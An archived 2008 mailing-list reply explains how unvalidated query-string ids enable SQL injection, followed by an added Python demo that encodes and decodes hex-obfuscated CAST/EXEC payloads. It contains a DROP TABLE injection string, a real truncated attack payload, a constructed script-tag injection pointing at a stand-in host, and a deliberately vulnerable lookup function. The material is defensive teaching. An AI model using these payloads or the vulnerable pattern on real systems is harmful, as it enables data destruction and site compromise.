[thelist] Website Hacked?
Anthony Baratta
anthony at baratta.com
Sat May 24 17:40:10 CDT 2008
Todd Richards wrote:
> Thanks Anthony. I am checking so that when someone requests a store - ie.
> Store.asp?id=300 - if it's not a numeric value then they will get redirected
> to the home page. However, I'm raw on how they could actually get data
> entered into my database. I know it can happen - I hear about it all the
> time. However, I'm just not sure where to start to fix it. The "admin"
> directory is using Windows authentication rather than a database login,
> since I'm the only one who has permissions to update things. Would that
> make a difference?
When you fail to validate your data types, you open your SQL statements
to manipulation. For example:
Store.asp?id=300;DROP TABLE Store_Inventory;
Obviously they need to convert the space and the semi-colon with URL
Encoding, but if your code does not validate the 300 string it will run
both statements and you are hosed.
The more sophisticated hackers will encode their SQL statements like this:
Store.asp?id=300;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F5222736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20VARCHAR(4000));EXEC(@S);
This is an actual hack attempt against one of my servers. It's truncated
for length, but a real life example of how they do it.
--
Anthony Baratta
Every man takes the limits of his own field of vision for the limits of
the world.
— Arthur Schopenhauer
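The two things Anthony describes, a stacked statement riding on an unvalidated numeric id and a payload hidden behind CAST(0x... AS VARCHAR), as an added, runnable example that is not part of the original post. It uses Python with an in-memory sqlite3 database standing in for SQL Server (executescript plays the role of the server running a whole batch); the request strings, table names and the hidden statement are constructed for the demo, and decode_cast_payload is the kind of helper you would run over web logs to see what an encoded attempt actually tried to execute:

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the statement a real payload hides; the 2008-era
# mass injections carried a cursor script that appended a <script> tag to
# every text column. example.invalid is a reserved, non-resolving name.
HIDDEN_SQL = ("DECLARE @T VARCHAR(255);"
              "UPDATE Store SET name=name+'<script src=http://example.invalid/x.js></script>'")


def encode_cast_request(sql, nvarchar=False):
    """Build a request in the shape shown in the post: the real statement is
    hex-encoded inside CAST(0x... AS VARCHAR) and executed via EXEC(@S)."""
    if nvarchar:
        hexed = sql.encode("utf-16-le").hex().upper()  # NVARCHAR is UTF-16LE
        kind = "NVARCHAR"
    else:
        hexed = sql.encode("latin-1").hex().upper()
        kind = "VARCHAR"
    return ("Store.asp?id=300;DECLARE%20@S%20" + kind + "(4000);SET%20@S=CAST(0x"
            + hexed + "%20AS%20" + kind + "(4000));EXEC(@S);")


_CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)


def decode_cast_payload(request):
    """Recover the hidden statement from a logged request line, or None."""
    m = _CAST_RE.search(unquote(request))
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    return raw.decode("utf-16-le" if m.group(2).upper() == "N" else "latin-1")


def parse_store_id(raw):
    """Accept only a short unsigned decimal id; anything else means 'redirect home'.
    A strict pattern is used rather than str.isdigit(), which also accepts
    Unicode digits that int() rejects."""
    if raw is None or not re.fullmatch(r"[0-9]{1,9}", raw):
        return None
    return int(raw)


def make_demo_db():
    """Constructed schema: a Store table and the Store_Inventory table the
    post's example tries to drop."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Store (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE Store_Inventory (store_id INTEGER, sku TEXT);
        INSERT INTO Store VALUES (300, 'Widgets');
        INSERT INTO Store_Inventory VALUES (300, 'W-1');
    """)
    return conn


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row is not None


def vulnerable_lookup(conn, raw_id):
    """The flaw from the post: the id is pasted into the SQL text and the
    driver runs every statement in the string. Returns the SQL that ran."""
    sql = "SELECT name FROM Store WHERE id = " + raw_id
    conn.executescript(sql)  # runs the SELECT and whatever follows the ';'
    return sql


def safe_lookup(conn, raw_id):
    """Hardened form: validate the type first, then bind the value as a
    parameter so it can never be parsed as SQL."""
    store_id = parse_store_id(raw_id)
    if store_id is None:
        return None  # the ASP page would Response.Redirect to the home page here
    row = conn.execute("SELECT name FROM Store WHERE id = ?", (store_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(decode_cast_payload(encode_cast_request(HIDDEN_SQL)))
    db = make_demo_db()
    print(safe_lookup(db, "300"), safe_lookup(db, "300;DROP TABLE Store_Inventory;"))
    vulnerable_lookup(db, "300;DROP TABLE Store_Inventory;")
    print("Store_Inventory still exists:", table_exists(db, "Store_Inventory"))
```

Note that the numeric check alone is what stops the attack here, but the parameter binding in safe_lookup is the part worth keeping even after validation: it protects every other query on the site where the input is legitimately a string. Windows authentication on the admin directory does not enter into it, since Store.asp runs the query under the site's own database login regardless of who the visitor is.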